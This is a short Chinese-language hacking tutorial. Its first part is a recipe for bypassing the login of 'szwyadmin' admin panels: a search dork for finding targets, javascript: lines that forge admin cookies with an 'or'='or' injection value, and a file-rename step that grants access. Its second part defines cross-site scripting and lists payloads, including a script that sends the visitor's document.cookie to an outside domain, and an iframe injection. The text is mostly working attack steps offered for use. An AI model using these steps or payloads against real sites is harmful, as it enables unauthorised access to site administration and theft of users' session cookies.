azwyadmin程序cookies欺骗漏洞:
一、搜索关键字
inurl:szwyadmin/login.asp
二、进入执行代码
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
三、更改文件名
login.asp改为admin_index.asp
四、访问OK
跨站攻击网站:
一、跨站攻击的概念
跨站攻击:即Cross Site Script Execution(通常简写为XSS),攻击者输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。
二、跨站攻击的演示
<script>alert("这个是跨站攻击")</script>
<script>windows.open('http://域名/info.asp=?msg='+document.cookie)</script>
<iframe src=http://star.news.sohu.com/s2016/editorial-50/ width=500 height=500></iframe>